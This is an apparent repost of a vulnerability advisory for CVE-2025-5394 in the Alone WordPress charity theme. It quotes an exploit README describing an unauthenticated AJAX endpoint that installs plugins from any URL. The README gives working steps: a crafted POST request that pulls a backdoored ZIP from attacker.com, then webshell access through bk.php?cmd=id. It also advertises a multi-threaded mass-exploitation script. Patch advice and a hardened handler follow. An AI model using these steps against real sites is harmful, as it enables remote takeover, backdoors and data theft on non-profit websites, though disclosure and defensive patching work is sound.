Alone – Charity Multipurpose Non-profit WordPress Theme Unauthenticated Arbitrary File Upload Vulnerability

Vulnerability Information

Vulnerability name: Alone – Charity Multipurpose Non-profit WordPress Theme Unauthenticated Arbitrary File Upload Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-5394

Vulnerability type: File upload

Severity: Critical

Vulnerability description: Affected product: Alone is a WordPress theme designed for non-profit organizations and charities, widely used to build donation, event and volunteer-management websites. Because of its versatility and ease of use it is deployed worldwide, particularly by non-profits that need to set up a professional website quickly.

Vulnerability explanation: Versions 7.8.3 and earlier of this theme contain an unauthenticated arbitrary file upload vulnerability (type: file upload). The technical root cause is that the beplus_import_pack_install_plugin function is exposed to the public through wp_ajax_nopriv_ without any authentication or capability check. The function installs and activates a plugin from a URL supplied by an unauthenticated user, so an attacker can upload a malicious plugin ZIP file and achieve remote code execution (RCE).

Impact analysis: This vulnerability allows unauthenticated attackers to upload arbitrary files, including malicious plugins, leading to remote code execution and full site compromise. Because the attack requires no authentication of any kind and can be exploited at scale with automated tools, the risk is extremely high. Attackers can use it to plant backdoors, steal sensitive data, or go on to attack site visitors. Given how widely WordPress is used, the scope of impact may be very broad, especially on sites that have not been updated promptly.

Product name: Alone – Charity Multipurpose Non-profit WordPress Theme

Affected versions: <= 7.8.3

Source: https://github.com/Yucaerin/CVE-2025-5394

Type: CVE-2025: GitHub search

Repository files

  • README.md
  • mass_beplus_exploit.py

Source overview

CVE-2025-5394 – WordPress Alone Theme <= 7.8.3 - Unauthenticated Arbitrary File Upload via Plugin Installation

🔥 Vulnerability Summary
The WordPress theme Alone, in versions <= 7.8.3, is vulnerable to unauthenticated arbitrary file upload. This flaw allows unauthenticated attackers to upload and install arbitrary plugin ZIP files from remote URLs via an unprotected AJAX endpoint, resulting in remote code execution (RCE) by deploying backdoored plugins.

This vulnerability stems from the beplus_import_pack_install_plugin function exposed to the public via wp_ajax_nopriv_ without any authentication or capability checks. The function installs and activates a plugin from a user-supplied URL.

🔍 Affected Theme

  • Theme Name: Alone – Charity Multipurpose Non-profit WordPress Theme
  • Affected Version: <= 7.8.3
  • Vulnerability Type: Unauthenticated Arbitrary File Upload → RCE
  • CVE ID: CVE-2025-5394
  • CVSS Score: 9.8 (Critical)
  • Impact: Full remote code execution (RCE) and full site compromise

🧪 Exploit Features

  • 🔓 No authentication required
  • 📦 Uploads malicious plugin ZIP directly from remote URL
  • 🚀 Automatically installs and activates the plugin
  • 🐚 Webshell delivery supported via embedded PHP in plugin
  • AJAX endpoint accessible by unauthenticated users:
    /wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin

🧠 Researcher

🚀 Usage

  1. Prepare a malicious plugin ZIP file hosted on a server you control.

    • Must contain a valid plugin header (Plugin Name:) and PHP backdoor (e.g., bk.php)
  2. Craft the following POST request:

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: victim.com
    Content-Type: application/x-www-form-urlencoded

    action=beplus_import_pack_install_plugin&
    data[plugin_slug]=hello-dolly&
    data[plugin_source]=https://attacker.com/hello-dolly.zip
  3. If successful, the plugin is installed and activated. Access your shell at:

    https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id

🧰 Mass Exploitation Script
This repository includes a mass exploit tool with:

  • Multi-threaded processing
  • Automatic HTTPS prefixing (if missing)
  • Live logging of successful targets to result.txt

See mass_beplus_exploit.py for details.

🛠 Fix Recommendations

  • Theme authors should remove or secure the wp_ajax_nopriv_beplus_import_pack_install_plugin hook.
  • Implement authentication/capability checks (e.g., current_user_can('install_plugins')).
  • Validate and restrict plugin sources.
  • Use a Web Application Firewall (WAF) to block unauthorized admin-ajax access.
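One way to implement the recommendations above, as an added illustration that is not the Alone theme's own code or its vendor's patch: the handler is registered only on the authenticated wp_ajax_ hook, verifies a nonce and the install_plugins capability, and accepts only a plugin slug that it resolves through the wordpress.org plugin API instead of a client-supplied package URL. The function name, the nonce action name and the structure of the fixed theme are assumptions.

```php
<?php
// Added illustration (not the Alone theme's code): a hardened AJAX plugin-install
// handler of the kind the fix recommendations describe. The hook name is the one
// from the advisory; the handler body and nonce action name are assumptions.

// Register only the authenticated hook: no wp_ajax_nopriv_ registration at all.
add_action( 'wp_ajax_beplus_import_pack_install_plugin', 'hardened_import_pack_install_plugin' );

function hardened_import_pack_install_plugin() {
    // 1. CSRF protection: the request must carry a nonce issued to this logged-in user.
    check_ajax_referer( 'beplus_import_pack', 'nonce' );

    // 2. Capability check: only users allowed to install and activate plugins proceed.
    if ( ! current_user_can( 'install_plugins' ) || ! current_user_can( 'activate_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Never accept an arbitrary package URL from the client. Take only a slug and
    //    resolve the download link through the wordpress.org plugin API.
    $slug = isset( $_POST['data']['plugin_slug'] ) ? sanitize_key( wp_unslash( $_POST['data']['plugin_slug'] ) ) : '';
    if ( '' === $slug ) {
        wp_send_json_error( array( 'message' => 'Missing plugin slug.' ), 400 );
    }

    require_once ABSPATH . 'wp-admin/includes/plugin-install.php';
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';

    $api = plugins_api( 'plugin_information', array( 'slug' => $slug, 'fields' => array( 'sections' => false ) ) );
    if ( is_wp_error( $api ) || empty( $api->download_link ) ) {
        wp_send_json_error( array( 'message' => 'Unknown plugin slug.' ), 404 );
    }

    // 4. Defence in depth: the resolved package must still come from wordpress.org.
    $host = wp_parse_url( $api->download_link, PHP_URL_HOST );
    if ( 'downloads.wordpress.org' !== $host ) {
        wp_send_json_error( array( 'message' => 'Refusing non-wordpress.org package.' ), 400 );
    }

    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $result   = $upgrader->install( $api->download_link );
    if ( is_wp_error( $result ) || ! $result ) {
        wp_send_json_error( array( 'message' => 'Installation failed.' ), 500 );
    }

    $activated = activate_plugin( $upgrader->plugin_info() );
    if ( is_wp_error( $activated ) ) {
        wp_send_json_error( array( 'message' => $activated->get_error_message() ), 500 );
    }
    wp_send_json_success( array( 'installed' => $slug ) );
}
```

The nonce must be generated with wp_create_nonce('beplus_import_pack') in the admin page that issues the request; without it, every call fails at check_ajax_referer before any capability or source check runs.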

🔒 Disclaimer:
This information is provided for educational and authorized security testing purposes only. Unauthorized access or use of computer systems is illegal and unethical.

📚 Reference:

CVE: CVE-2025-5394
Researcher: Thai An


http://example.com/2025/08/02/github_4070834789/
Author: lianccc
Published: 2 August 2025